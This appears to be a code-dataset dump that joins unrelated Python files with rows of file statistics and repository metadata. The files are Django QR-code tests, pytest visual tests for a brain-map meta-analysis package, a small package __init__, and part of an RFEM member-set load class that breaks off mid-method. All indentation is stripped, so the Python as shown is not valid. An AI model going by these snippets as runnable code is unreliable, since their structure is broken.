self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, qr4)
# print(BASE64_PNG_IMAGE_TEMPLATE % result)
self.assertEqual(qr1, BASE64_PNG_IMAGE_TEMPLATE % result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_error_correction(self):
file_base_name = 'qrfromtextpngresult_error_correction'
tests_data = []
for correction_level in ERROR_CORRECTION_DICT.keys():
ref_file_name = '%s_%s%s' % (file_base_name, correction_level, PNG_REF_SUFFIX)
tests_data.append(dict(source='{% qr_from_text "' + COMPLEX_TEST_TEXT + '" image_format="png" error_correction="' + correction_level + '" %}', ref_file_name=ref_file_name.lower()))
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
html_source = mark_safe('{% load qr_code %}' + test_data['source'])
template = Template(html_source)
context = Context()
source_image = template.render(context).strip()
source_image_data = source_image[33:-len('" alt="%s"' % escape(COMPLEX_TEST_TEXT))]
source_image_data = base64.b64decode(source_image_data)
# Debug code for updating reference file.
# write_png_content_to_file(test_data['ref_file_name'], source_image_data)
ref_image_data = get_png_content_from_file_name(test_data['ref_file_name'])
self.assertEqual(source_image_data, ref_image_data)
class TestQRForApplications(SimpleTestCase):
@staticmethod
def _make_test_data(tag_pattern, ref_file_name, tag_args, template_context=dict()):
tag_content = tag_pattern
for key, value in tag_args.items():
if isinstance(value, str):
tag_content += ' %s="%s"' % (key, value)
else:
tag_content += ' %s=%s' % (key, value)
return dict(source='{% ' + tag_content + ' %}', ref_file_name=ref_file_name, template_context=template_context)
@staticmethod
def _make_tests_data(embedded=True, image_format=SVG_FORMAT_NAME):
contact_detail1 = dict(**TEST_CONTACT_DETAIL)
contact_detail2 = ContactDetail(
**contact_detail1
)
wifi_config1 = dict(**TEST_WIFI_CONFIG)
wifi_config2 = WifiConfig(
**wifi_config1
)
google_maps_coordinates = Coordinates(latitude=586000.32, longitude=250954.19)
geolocation_coordinates = Coordinates(latitude=586000.32, longitude=250954.19, altitude=500)
if image_format == SVG_FORMAT_NAME:
ref_suffix = SVG_REF_SUFFIX
else:
ref_suffix = PNG_REF_SUFFIX
tag_prefix = 'qr_for_' if embedded else 'qr_url_for_'
tag_args = dict(image_format=image_format)
if image_format == PNG_FORMAT_NAME:
tag_args['size'] = 't'
if not embedded:
# Deactivate cache for URL.
tag_args['cache_enabled'] = False
raw_data = (
('email', '"john.doe@domain.com"', None),
('tel', ' "+41769998877"', None),
('sms', ' "+41769998877"', None),
('geolocation', 'latitude=586000.32 longitude=250954.19 altitude=500', None),
('geolocation', 'coordinates=coordinates', {'coordinates': geolocation_coordinates}),
('google_maps', 'latitude=586000.32 longitude=250954.19', None),
('google_maps', 'coordinates=coordinates', {'coordinates': google_maps_coordinates}),
('wifi', 'wifi_config', {'wifi_config': wifi_config1}),
('wifi', 'wifi_config', {'wifi_config': wifi_config2}),
('wifi', 'wifi_config=wifi_config', {'wifi_config': wifi_config2}),
('contact', 'contact_detail', {'contact_detail': contact_detail1}),
('contact', 'contact_detail', {'contact_detail': contact_detail2}),
('contact', 'contact_detail=contact_detail', {'contact_detail': contact_detail2}),
('youtube', '"J9go2nj6b3M"', None),
('youtube', 'video_id', {'video_id': "J9go2nj6b3M"}),
('google_play', '"ch.admin.meteoswiss"', None),
)
tests_data = []
for tag_base_name, tag_data, template_context in raw_data:
test_data = TestQRForApplications._make_test_data(tag_pattern='%s%s %s' % (tag_prefix, tag_base_name, tag_data),
ref_file_name='qr_for_%s%s' % (tag_base_name, ref_suffix),
tag_args=tag_args,
template_context=template_context)
tests_data.append(test_data)
return tests_data
@staticmethod
def _get_rendered_template(template_source, template_context):
html_source = mark_safe('{% load qr_code %}' + template_source)
template = Template(html_source)
context = Context()
if template_context:
context.update(template_context)
return template.render(context).strip()
def test_demo_samples_embedded_in_svg_format(self):
tests_data = self._make_tests_data(embedded=True)
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
source_image_data = TestQRForApplications._get_rendered_template(test_data['source'], test_data.get('template_context'))
ref_image_data = get_svg_content_from_file_name(test_data['ref_file_name'])
self.assertEqual(source_image_data, ref_image_data)
def test_demo_samples_embedded_in_png_format(self):
tests_data = self._make_tests_data(embedded=True, image_format=PNG_FORMAT_NAME)
image_data_re = re.compile(r'data:image/png;base64, (?P<data>[\w/+=]+)')
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
source_image_data = TestQRForApplications._get_rendered_template(test_data['source'], test_data.get('template_context'))
match = image_data_re.search(source_image_data)
source_image_data = match.group('data')
source_image_data = base64.b64decode(source_image_data)
ref_image_data = get_png_content_from_file_name(test_data['ref_file_name'])
# write_png_content_to_file(test_data['ref_file_name'], source_image_data)
self.assertEqual(source_image_data, ref_image_data)
def test_demo_sample_urls_in_svg_format(self):
tests_data = self._make_tests_data(embedded=False)
for test_data in tests_data:
source_image_data = self._check_url_for_test_data(test_data).content.decode('utf-8')
source_image_data = _make_closing_path_tag(source_image_data)
ref_image_data = get_svg_content_from_file_name(test_data['ref_file_name'], skip_header=False)
self.assertEqual(source_image_data, ref_image_data)
def test_demo_sample_urls_in_png_format(self):
tests_data = self._make_tests_data(embedded=False, image_format=PNG_FORMAT_NAME)
for test_data in tests_data:
source_image_data = self._check_url_for_test_data(test_data).content
ref_image_data = get_png_content_from_file_name(test_data['ref_file_name'])
# write_png_content_to_file(test_data['ref_file_name'], source_image_data)
self.assertEqual(source_image_data, ref_image_data)
def _check_url_for_test_data(self, test_data):
print('Testing template: %s' % test_data['source'])
source_image_url = TestQRForApplications._get_rendered_template(test_data['source'],
test_data.get('template_context'))
response = self.client.get(source_image_url)
self.assertEqual(response.status_code, 200)
return response
class TestIssues(SimpleTestCase):
def test_reverse_lazy_url(self):
from django.urls import reverse, reverse_lazy
options = QRCodeOptions(image_format='svg', size=1)
url1 = make_qr_code_url(reverse('qr_code:serve_qr_code_image'), options)
url2 = make_qr_code_url(reverse_lazy('qr_code:serve_qr_code_image'), options)
self.assertEqual(url1, url2)
svg1 = make_embedded_qr_code(reverse('qr_code:serve_qr_code_image'), options)
svg2 = make_embedded_qr_code(reverse_lazy('qr_code:serve_qr_code_image'), options)
self.assertEqual(svg1, svg2)
def get_svg_content_from_file_name(file_name, skip_header=True):
with open(os.path.join(get_resources_path(), file_name), 'r', encoding='utf-8') as file:
if skip_header:
# Skip SVG header.
file.readline()
image_data = file.read().strip()
return image_data
def get_png_content_from_file_name(file_name):
with open(os.path.join(get_resources_path(), file_name), 'rb') as file:
image_data = file.read()
return image_data
# Uncomment in order to renew some of the reference files.
# def write_png_content_to_file(file_name, image_content):
# with open(os.path.join(get_resources_path(), file_name), 'wb') as file:
# file.write(image_content)
#
#
# def write_svg_content_to_file(file_name, image_content):
# with open(os.path.join(get_resources_path(), file_name), 'wt', encoding='utf-8') as file:
# file.write(image_content)
| 288.706806 | 26,664 | 0.611259 | 57,445 | 165,429 | 1.739194 | 0.01323 | 0.053729 | 0.016065 | 0.004484 | 0.791618 | 0.657265 | 0.541388 | 0.434209 | 0.412369 | 0.40218 | 0 | 0.478013 | 0.253414 | 165,429 | 572 | 26,665 | 289.211538 | 0.330888 | 0.012936 | 0 | 0.355748 | 0 | 0.05423 | 0.851625 | 0.077515 | 0 | 1 | 0 | 0 | 0.158351 | 1 | 0.075922 | false | 0.006508 | 0.034707 | 0.002169 | 0.154013 | 0.023861 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ca94d8c5d1c4d184a812b08cde4e2b27f6425ae | 7,756 | py | Python | tests/Maps/test_visual.py | aperezlebel/meta_analysis | 10f983a4f3a94d385b9cd69a13c36ac610b1be93 | [
"MIT"
] | null | null | null | tests/Maps/test_visual.py | aperezlebel/meta_analysis | 10f983a4f3a94d385b9cd69a13c36ac610b1be93 | [
"MIT"
] | null | null | null | tests/Maps/test_visual.py | aperezlebel/meta_analysis | 10f983a4f3a94d385b9cd69a13c36ac610b1be93 | [
"MIT"
] | null | null | null | """Visual tests on a single example."""
import pytest
import matplotlib.pyplot as plt
import nilearn
from meta_analysis import Maps, plotting
from globals_test import template, atlas, df
# Parameters
sigma = 2.
# Maps
maps = Maps(df, template=template, groupby_col='pmid')
maps_dense = Maps(df, template=template, groupby_col='pmid', save_memory=False)
maps_atlas = Maps(df, template=template, groupby_col='pmid', atlas=atlas)
avg, var = maps.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=False)
avg_dense, var_dense = maps_dense.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=False)
avg_atlas, var_atlas = maps_atlas.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=False)
avg_biased, var_biased = maps.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=True)
avg_dense_biased, var_dense_biased = maps_dense.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=True)
avg_atlas_biased, var_atlas_biased = maps_atlas.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=True)
@pytest.mark.mpl_image_compare
def test_sum():
"""Test sum of maps."""
sum = maps.summed_map()
return plotting.plot_activity_map(sum.to_img())
@pytest.mark.mpl_image_compare
def test_avg():
"""Test avg of maps."""
avg = maps.avg()
return plotting.plot_activity_map(avg.to_img())
@pytest.mark.mpl_image_compare
def test_var():
"""Test var of maps."""
var = maps.var()
return plotting.plot_activity_map(var.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg():
"""Test iterative avg of maps."""
avg, _ = maps.iterative_smooth_avg_var(compute_var=False, sigma=sigma, bias=False)
return plotting.plot_activity_map(avg.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1():
"""Test iterative avg of maps."""
return plotting.plot_activity_map(avg.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2():
"""Test iterative var of maps."""
return plotting.plot_activity_map(var.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1():
"""Test iterative avg thresholded of maps."""
return plotting.plot_activity_map(avg.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2():
"""Test iterative var thresholded of maps."""
return plotting.plot_activity_map(var.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1_dense():
"""Test iterative avg of dense maps."""
return plotting.plot_activity_map(avg_dense.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2_dense():
"""Test iterative var of dense maps."""
return plotting.plot_activity_map(var_dense.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1_dense():
"""Test iterative avg of dense maps thresholded."""
return plotting.plot_activity_map(avg_dense.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2_dense():
"""Test iterative var of maps thresholded."""
return plotting.plot_activity_map(var_dense.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1_biased():
"""Test iterative biased avg of maps."""
return plotting.plot_activity_map(avg_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2_biased():
"""Test iterative biased var of maps."""
return plotting.plot_activity_map(var_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1_biased():
"""Test iterative biased avg of maps thresholded."""
return plotting.plot_activity_map(avg_biased.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2_biased():
"""Test iterative biased var of maps thresholded."""
return plotting.plot_activity_map(var_biased.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1_dense_biased():
"""Test iterative biased avg of dense maps."""
return plotting.plot_activity_map(avg_dense_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2_dense_biased():
"""Test iterative biased var of dense maps."""
return plotting.plot_activity_map(var_dense_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1_dense_biased():
"""Test iterative biased avg of dense maps thresholded."""
return plotting.plot_activity_map(avg_dense_biased.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2_dense_biased():
"""Test iterative biased var of dense maps thresholded."""
return plotting.plot_activity_map(var_dense_biased.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_atlas_sum():
"""Test sum of maps on atlas."""
sum = maps_atlas.summed_map()
return plotting.plot_activity_map(sum.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_avg():
"""Test avg of maps on atlas."""
avg = maps_atlas.avg()
return plotting.plot_activity_map(avg.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_var():
"""Test var of maps on atlas."""
var = maps_atlas.var()
return plotting.plot_activity_map(var.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg():
"""Test iterative avg of maps on atlas."""
avg, _ = maps_atlas.iterative_smooth_avg_var(compute_var=False, sigma=sigma, bias=False)
return plotting.plot_activity_map(avg.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_1():
"""Test iterative avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_2():
"""Test iterative var of maps on atlas."""
return plotting.plot_activity_map(var_atlas.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_1():
"""Test iterative avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas.to_img_atlas(ignore_bg=True), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_2():
"""Test iterative var of maps on atlas."""
return plotting.plot_activity_map(var_atlas.to_img_atlas(ignore_bg=True), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_1_biased():
"""Test iterative biased avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas_biased.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_2_biased():
"""Test iterative biased var of maps on atlas."""
return plotting.plot_activity_map(var_atlas_biased.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_1_biased():
"""Test thresholded iterative avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas_biased.to_img_atlas(ignore_bg=True), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_2_biased():
"""Test thresholded iterative var of maps on atlas."""
return plotting.plot_activity_map(var_atlas_biased.to_img_atlas(ignore_bg=True), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_atlas_cov():
"""Test cov computation on atlas."""
cov, labels = maps_atlas.cov()
fig = plt.figure(figsize=(20, 20))
nilearn.plotting.plot_matrix(cov, labels=labels, figure=fig)
return fig
| 33.431034 | 114 | 0.776818 | 1,198 | 7,756 | 4.666945 | 0.059265 | 0.095332 | 0.07673 | 0.106242 | 0.908782 | 0.890181 | 0.88553 | 0.855661 | 0.813092 | 0.773744 | 0 | 0.013838 | 0.114879 | 7,756 | 231 | 115 | 33.575758 | 0.800583 | 0.162068 | 0 | 0.32 | 0 | 0 | 0.001897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.264 | false | 0 | 0.04 | 0 | 0.568 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
9cb1cb234cb45329b115e44a99dd2489728caf45 | 81 | py | Python | src/data_functions/__init__.py | cuevas1208/Tradebot | f6499bc75d625414c9a474c774912cb502a153d8 | [
"MIT"
] | null | null | null | src/data_functions/__init__.py | cuevas1208/Tradebot | f6499bc75d625414c9a474c774912cb502a153d8 | [
"MIT"
] | null | null | null | src/data_functions/__init__.py | cuevas1208/Tradebot | f6499bc75d625414c9a474c774912cb502a153d8 | [
"MIT"
] | null | null | null | from . import data_load
from . import data_prepare
from . import prepare_CNNData
| 20.25 | 29 | 0.814815 | 12 | 81 | 5.25 | 0.5 | 0.47619 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 81 | 3 | 30 | 27 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9ce2bef3b48df04b706f04ddc3a248e544327266 | 108,760 | py | Python | RFEM/Loads/membersetload.py | r0m30d4c/DlubalRFEM6 | 4bd0d744007bdc27d86d6ce535a507cdc81552ca | [
"MIT"
] | null | null | null | RFEM/Loads/membersetload.py | r0m30d4c/DlubalRFEM6 | 4bd0d744007bdc27d86d6ce535a507cdc81552ca | [
"MIT"
] | null | null | null | RFEM/Loads/membersetload.py | r0m30d4c/DlubalRFEM6 | 4bd0d744007bdc27d86d6ce535a507cdc81552ca | [
"MIT"
] | null | null | null | from RFEM.initModel import *
from RFEM.enums import *
class MemberSetLoad():
def __init__(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction = LoadDirectionType.LOAD_DIRECTION_LOCAL_Z,
magnitude: float = 0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction (enum): Load Case Enumeration
magnitude (float): Load Magnitude
comment (str, optional): Comments
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_FORCE
clientObject.load_type = load_type.name
# Member Load Distribution
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
clientObject.magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Force(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution= MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction= MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
force_eccentricity: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameter
force_eccentricity (bool): Force Eccentricity Option
comment (str, optional): Comments
params (dict, optional): Parameters
for LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for LOAD_DISTRIBUTION_UNIFORM_TOTAL:
load_parameter = [magnitude]
for LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [relative_distance = False, magnitude, distance_a]
for LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude, count_n, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, relative_distance_c = False, magnitude, distance_a, distance_b, distance_c]
for LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_TAPERED:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for LOAD_DISTRIBUTION_VARYING_IN_Z:
load_parameter = [[distance, delta_distance, magnitude], ...]
params:
{'eccentricity_horizontal_alignment': MemberSetLoadEccentricityHorizontalAlignment.ALIGN_NONE,
'eccentricity_vertical_alignment': MemberSetLoadEccentricityVerticalAlignment.ALIGN_NONE,
'eccentricity_section_middle': MemberSetLoadEccentricitySectionMiddle.LOAD_ECCENTRICITY_SECTION_MIDDLE_CENTER_OF_GRAVITY,
'is_eccentricity_at_end_different_from_start': False,
'eccentricity_y_at_end': 0.0,
'eccentricity_y_at_start': 0.0,
'eccentricity_z_at_end': 0.0,
'eccentricity_z_at_start': 0.0}
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_FORCE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution= load_distribution.name
#Load Magnitude and Parameters
if load_parameter == []:
raise Exception("WARNING: Load parameter cannot be empty. Kindly check list inputs completeness and correctness.")
else:
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM" or load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM_TOTAL":
if len(load_parameter) == 1:
clientObject.magnitude = load_parameter[0]
else:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_1":
if len(load_parameter) == 3:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
if load_parameter[0] == False:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_absolute = load_parameter[2]
else:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_relative = load_parameter[2]
else:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_N":
if len(load_parameter) == 6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude = load_parameter[2]
clientObject.count_n = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2x2":
if len(load_parameter) == 7:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.distance_c_is_defined_as_relative = load_parameter[2]
clientObject.magnitude = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
if load_parameter[2] == False:
clientObject.distance_c_absolute = load_parameter[6]
else:
clientObject.distance_c_relative = load_parameter[6]
else:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2":
if len(load_parameter) == 6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution.name == "LOAD_DISTRIBUTION_TRAPEZOIDAL":
if len(load_parameter) == 6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_TAPERED":
if len(load_parameter)==6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude_1 = load_parameter[2]
clientObject.magnitude_2 = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_PARABOLIC":
if len(load_parameter)==3:
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
else:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING_IN_Z":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Member Load Direction
clientObject.load_direction = load_direction.name
#Force Eccentiricity
clientObject.has_force_eccentricity = force_eccentricity
if force_eccentricity == True:
